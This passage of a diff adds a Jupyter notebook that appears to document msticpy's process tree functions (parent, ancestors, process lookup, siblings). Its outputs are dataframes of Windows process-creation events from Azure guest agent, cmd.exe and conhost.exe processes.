+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...    4688   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...    4688   \n",
+       "\n",
+       "                                                                      TimeGenerated  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23... 2019-02-09 23:20:15.547000+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-... 2019-02-09 23:20:15.560000+00:00   \n",
+       "\n",
+       "                                                           Computer  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  MSTICAlertsWin1   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  MSTICAlertsWin1   \n",
+       "\n",
+       "                                                   SubjectUserSid  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...            NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...       S-1-5-18   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...       S-1-5-18   \n",
+       "\n",
+       "                                                     SubjectUserName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...               NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  MSTICAlertsWin1$   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   SubjectDomainName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...               NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...         WORKGROUP   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...         WORKGROUP   \n",
+       "\n",
+       "                                                   SubjectLogonId  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...          0x3e7   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...          0x3e7   \n",
+       "\n",
+       "                                                   NewProcessId  ...  \\\n",
+       "proc_key                                                         ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x1994  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x123c  ...   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...        0xccc  ...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...       0x14ec  ...   \n",
+       "\n",
+       "                                                   source_index_par  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...            986.0   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...            988.0   \n",
+       "\n",
+       "                                                   ProcessId_par  \\\n",
+       "proc_key                                                           \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...        0x1994   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...        0x123c   \n",
+       "\n",
+       "                                                                                   NewProcessName_par  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                                NaN   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...                        C:\\Windows\\System32\\cmd.exe   \n",
+       "\n",
+       "                                                                 timestamp_orig_par  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                              NaT   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        1970-01-01 00:00:00+00:00   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23... 2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-... 2019-02-09 23:20:15.547000+00:00   \n",
+       "\n",
+       "                                                                                           parent_key  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                                                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 2...   \n",
+       "\n",
+       "                                                   IsRoot IsLeaf IsBranch  \\\n",
+       "proc_key                                                                    \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...   True  False    False   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...  False  False     True   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  False   True    False   \n",
+       "\n",
+       "                                                                path  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              1007   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          1007/103   \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...      1007/103/105   \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...  1007/103/105/106   \n",
+       "\n",
+       "                                                   parent_index  \n",
+       "proc_key                                                         \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          NaN  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         1007  \n",
+       "c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 23...          103  \n",
+       "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-...          105  \n",
+       "\n",
+       "[4 rows x 35 columns]"
+      ]
+     },
+     "execution_count": 16,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Get Ancestors\n",
+    "# Get a child process that's at the bottom of the tree\n",
+    "btm_descnt = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n",
+    "\n",
+    "print(\"parent\")\n",
+    "display(ptree.get_parent(p_tree_win, btm_descnt)[:20])\n",
+    "print(\"ancestors\")\n",
+    "ptree.get_ancestors(p_tree_win, btm_descnt).head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-16T23:30:16.035630Z",
+     "start_time": "2019-12-16T23:30:16.032653Z"
+    }
+   },
+   "source": [
+    "### get_process by_process_key\n",
+    "Get a process record by its key."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.297997Z",
+     "start_time": "2020-08-25T15:53:47.283997Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6"
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-09 23:20:15.560000\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "TenantId                             52b1ab41-869e-4138-9e40-2a4457f09bf0\n",
+       "Account                                        WORKGROUP\\MSTICAlertsWin1$\n",
+       "EventID                                                              4688\n",
+       "TimeGenerated                            2019-02-09 23:20:15.560000+00:00\n",
+       "Computer                                                  MSTICAlertsWin1\n",
+       "SubjectUserSid                                                   S-1-5-18\n",
+       "SubjectUserName                                          MSTICAlertsWin1$\n",
+       "SubjectDomainName                                               WORKGROUP\n",
+       "SubjectLogonId                                                      0x3e7\n",
+       "NewProcessId                                                       0x14ec\n",
+       "NewProcessName                            C:\\Windows\\System32\\conhost.exe\n",
+       "TokenElevationType                                                 %%1936\n",
+       "ProcessId                                                           0xccc\n",
+       "CommandLine             \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff...\n",
+       "ParentProcessName                             C:\\Windows\\System32\\cmd.exe\n",
+       "TargetLogonId                                                         0x0\n",
+       "SourceComputerId                     263a788b-6526-4cdc-8ed9-d79402fe4aa0\n",
+       "TimeCreatedUtc                                 2019-02-09 23:20:15.560000\n",
+       "EffectiveLogonId                                                    0x3e7\n",
+       "new_process_lc                            c:\\windows\\system32\\conhost.exe\n",
+       "parent_proc_lc                                c:\\windows\\system32\\cmd.exe\n",
+       "source_index                                                          106\n",
+       "NewProcessId_par                                                    0xccc\n",
+       "EffectiveLogonId_par                                                0x3e7\n",
+       "new_process_lc_par                            c:\\windows\\system32\\cmd.exe\n",
+       "source_index_par                                                    988.0\n",
+       "ProcessId_par                                                      0x123c\n",
+       "NewProcessName_par                            C:\\Windows\\System32\\cmd.exe\n",
+       "timestamp_orig_par                       2019-02-09 23:20:15.547000+00:00\n",
+       "parent_key              c:\\windows\\system32\\cmd.exe|0xccc|2019-02-09 2...\n",
+       "IsRoot                                                              False\n",
+       "IsLeaf                                                               True\n",
+       "IsBranch                                                            False\n",
+       "path                                                     1007/103/105/106\n",
+       "parent_index                                                          105\n",
+       "Name: c:\\windows\\system32\\conhost.exe|0x14ec|2019-02-09 23:20:15.560000, dtype: object"
+      ]
+     },
+     "execution_count": 17,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "proc_key = btm_descnt.name\n",
+    "print(proc_key)\n",
+    "ptree.get_process(p_tree_win, proc_key)\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### get_siblings\n",
+    "Get the siblings of a process.\n",
+    "\n",
+    "Some functions take an `include_source` parameter. Setting this to True returns the source process with the result set."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:47.345997Z",
+     "start_time": "2020-08-25T15:53:47.299997Z"
+    },
+    "execution_event_id": "9afbc31d-1042-4856-8fa9-3fc9bdc8a92a",
+    "last_executed_text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)",
+    "persistent_id": "175c1262-ad6d-485c-999b-459cae210ad6",
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>Account</th>\n",
+       "      <th>EventID</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>Computer</th>\n",
+       "      <th>SubjectUserSid</th>\n",
+       "      <th>SubjectUserName</th>\n",
+       "      <th>SubjectDomainName</th>\n",
+       "      <th>SubjectLogonId</th>\n",
+       "      <th>NewProcessId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>source_index_par</th>\n",
+       "      <th>ProcessId_par</th>\n",
+       "      <th>NewProcessName_par</th>\n",
+       "      <th>timestamp_orig_par</th>\n",
+       "      <th>parent_key</th>\n",
+       "      <th>IsRoot</th>\n",
+       "      <th>IsLeaf</th>\n",
+       "      <th>IsBranch</th>\n",
+       "      <th>path</th>\n",
+       "      <th>parent_index</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>proc_key</th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 22:11:59.877000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x1c54</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/69</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:16:28.153000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x123c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/103</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\secagent\\wasecagentprov.exe|0xda8|2019-02-09 23:55:46.057000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-09 23:55:46.057000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0xda8</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/123</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 00:22:33.813000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x7fc</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/134</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>c:\\windowsazure\\guestagent_2.7.41491.901_2019-01-14_202614\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000</th>\n",
+       "      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n",
+       "      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n",
+       "      <td>4688</td>\n",
+       "      <td>2019-02-10 01:27:25.173000+00:00</td>\n",
+       "      <td>MSTICAlertsWin1</td>\n",
+       "      <td>S-1-5-18</td>\n",
+       "      <td>MSTICAlertsWin1$</td>\n",
+       "      <td>WORKGROUP</td>\n",
+       "      <td>0x3e7</td>\n",
+       "      <td>0x172c</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>1970-01-01 00:00:00+00:00</td>\n",
+       "      <td>c:\\windowsazure\\guestagent_2.7.41491.901_2019-...</td>\n",
+       "      <td>False</td>\n",
+       "      <td>False</td>\n",
+       "      <td>True</td>\n",
+       "      <td>1007/343</td>\n",
+       "      <td>1007</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 35 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                                TenantId  \\\n",
+       "proc_key                                                                                   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n",
+       "\n",
+       "                                                                       Account  \\\n",
+       "proc_key                                                                         \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  WORKGROUP\\MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   EventID  \\\n",
+       "proc_key                                                     \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...    4688   \n",
+       "\n",
+       "                                                                      TimeGenerated  \\\n",
+       "proc_key                                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 22:11:59.877000+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-09 23:16:28.153000+00:00   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd... 2019-02-09 23:55:46.057000+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 00:22:33.813000+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 2019-02-10 01:27:25.173000+00:00   \n",
+       "\n",
+       "                                                           Computer  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1   \n",
+       "\n",
+       "                                                   SubjectUserSid  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...       S-1-5-18   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       S-1-5-18   \n",
+       "\n",
+       "                                                     SubjectUserName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  MSTICAlertsWin1$   \n",
+       "\n",
+       "                                                   SubjectDomainName  \\\n",
+       "proc_key                                                               \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...         WORKGROUP   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...         WORKGROUP   \n",
+       "\n",
+       "                                                   SubjectLogonId  \\\n",
+       "proc_key                                                            \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...          0x3e7   \n",
+       "\n",
+       "                                                   NewProcessId  ...  \\\n",
+       "proc_key                                                         ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x1c54  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x123c  ...   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...        0xda8  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...        0x7fc  ...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...       0x172c  ...   \n",
+       "\n",
+       "                                                   source_index_par  \\\n",
+       "proc_key                                                              \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...              NaN   \n",
+       "\n",
+       "                                                   ProcessId_par  \\\n",
+       "proc_key                                                           \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...           NaN   \n",
+       "\n",
+       "                                                   NewProcessName_par  \\\n",
+       "proc_key                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...                NaN   \n",
+       "\n",
+       "                                                          timestamp_orig_par  \\\n",
+       "proc_key                                                                       \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00+00:00   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0... 1970-01-01 00:00:00+00:00   \n",
+       "\n",
+       "                                                                                           parent_key  \\\n",
+       "proc_key                                                                                                \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  c:\\windowsazure\\guestagent_2.7.41491.901_2019-...   \n",
+       "\n",
+       "                                                   IsRoot IsLeaf IsBranch  \\\n",
+       "proc_key                                                                    \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  False  False     True   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  False  False     True   \n",
+       "\n",
+       "                                                        path parent_index  \n",
+       "proc_key                                                                   \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...   1007/69         1007  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1007/103         1007  \n",
+       "c:\\windowsazure\\secagent\\wasecagentprov.exe|0xd...  1007/123         1007  \n",
+       "c:\\windowsazure\\guestagent_2.7.41491.901_2019-0...  1007/134         1007  \n",
